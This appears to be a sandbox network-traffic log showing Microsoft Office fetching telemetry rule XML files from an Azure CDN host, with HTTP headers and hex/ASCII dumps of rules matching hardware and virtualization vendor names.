                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:12 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 18:20:12 GMT
                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                      Content-Length: 419
                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582B9C710B28"
                                                                                                                                                                                                                                                                                                                      x-ms-request-id: c1b2f9d4-701e-0098-1062-26395f000000
                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T182012Z-16849878b782d4lwcu6h6gmxnw00000009mg000000009c6x
                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                      X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:12 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 49 69 5d 5b 4e 6e 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 54 74 5d 5b 45 65 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120653" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <SR T="2" R="([Ii][Nn][Nn][Oo][Tt][Ee][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                      138192.168.2.45130213.107.246.45443
                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:12 UTC192OUTGET /rules/rule120651v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:12 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 18:20:12 GMT
                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                      Content-Length: 415
                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BA80D96A1"
                                                                                                                                                                                                                                                                                                                      x-ms-request-id: 9f4f074d-601e-00ab-77c7-2a66f4000000
                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T182012Z-17c5cb586f62vrfquq10qybcuw00000002sg00000000qgdn
                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:12 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 47 67 5d 5b 4c 6c 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120651" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <SR T="2" R="([Gg][Oo][Oo][Gg][Ll][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                      139192.168.2.45130413.107.246.45443
                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:12 UTC192OUTGET /rules/rule120652v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:12 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 18:20:12 GMT
                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                      Content-Length: 471
                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582B97E6FCDD"
                                                                                                                                                                                                                                                                                                                      x-ms-request-id: bce25016-801e-0035-64b4-2a752a000000
                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T182012Z-159b85dff8f6x4jjhC1DFW7uqg00000001ng00000000637q
                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:12 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120652" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                      140192.168.2.45130513.107.246.45443
                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:12 UTC192OUTGET /rules/rule120654v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:12 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 18:20:12 GMT
                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                      Content-Length: 477
                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:05 GMT
                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BA54DCC28"
                                                                                                                                                                                                                                                                                                                      x-ms-request-id: 9921b831-601e-0097-069c-27f33a000000
                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T182012Z-16849878b78smng4k6nq15r6s40000000be000000000aygt
                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:12 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120654" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                      141192.168.2.45130613.107.246.45443
                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:13 UTC192OUTGET /rules/rule120655v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:13 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 18:20:13 GMT
                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                      Content-Length: 419
                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BB7F164C3"
                                                                                                                                                                                                                                                                                                                      x-ms-request-id: e5751b3d-f01e-0099-0a8e-299171000000
                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T182013Z-17c5cb586f659tsm88uwcmn6s400000002d0000000008hu9
                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:13 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 49 69 5d 5b 4d 6d 5d 5b 42 62 5d 5b 4f 6f 5d 5b 58 78 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120655" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <SR T="2" R="([Nn][Ii][Mm][Bb][Oo][Xx][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                      142192.168.2.45130713.107.246.45443
                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:13 UTC192OUTGET /rules/rule120656v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:13 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 18:20:13 GMT
                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                      Content-Length: 477
                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT
                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BA48B5BDD"
                                                                                                                                                                                                                                                                                                                      x-ms-request-id: 12c3b8a8-601e-0084-2933-2a6b3f000000
                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T182013Z-159b85dff8flqhxthC1DFWsvrs00000001ug00000000cuht
                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:13 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120656" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                      143192.168.2.45130813.107.246.45443
                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:13 UTC192OUTGET /rules/rule120657v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:13 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 18:20:13 GMT
                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                      Content-Length: 419
                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:57 GMT
                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582B9FF95F80"
                                                                                                                                                                                                                                                                                                                      x-ms-request-id: b7b81bb6-b01e-0084-3bc8-26d736000000
                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T182013Z-17c5cb586f672xmrz843mf85fn00000008w0000000009sp9
                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:13 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 55 75 5d 5b 54 74 5d 5b 41 61 5d 5b 4e 6e 5d 5b 49 69 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120657" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <SR T="2" R="([Nn][Uu][Tt][Aa][Nn][Ii][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                      144192.168.2.45131013.107.246.45443
                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:13 UTC192OUTGET /rules/rule120659v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:13 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 18:20:13 GMT
                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                      Content-Length: 468
                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BB3EAF226"
                                                                                                                                                                                                                                                                                                                      x-ms-request-id: 9016a745-201e-0096-70e6-25ace6000000
                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T182013Z-16849878b782d4lwcu6h6gmxnw00000009h000000000ndp5
                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                      X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:13 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 50 70 5d 5b 45 65 5d 5b 4e 6e 5d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 43 63 5d 5b 4b 6b 5d 20 5b 46 66 5d 5b 4f 6f 5d 5b 55 75 5d 5b 4e 6e 5d 5b 44 64 5d 5b 41 61 5d 5b 54 74 5d 5b 49 69 5d 5b 4f 6f 5d 5b 4e 6e 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49
                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120659" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <SR T="2" R="([Oo][Pp][Ee][Nn][Ss][Tt][Aa][Cc][Kk] [Ff][Oo][Uu][Nn][Dd][Aa][Tt][Ii][Oo][Nn])"> <S T="1" F="1" M="I


                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                      145192.168.2.45130913.107.246.45443
                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:13 UTC192OUTGET /rules/rule120658v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:13 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 18:20:13 GMT
                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                      Content-Length: 472
                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:34 GMT
                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BB650C2EC"
                                                                                                                                                                                                                                                                                                                      x-ms-request-id: 080d32a9-801e-0035-752d-2b752a000000
                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T182013Z-15b8d89586f4zwgbgswvrvz4vs0000000be0000000003cz4
                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
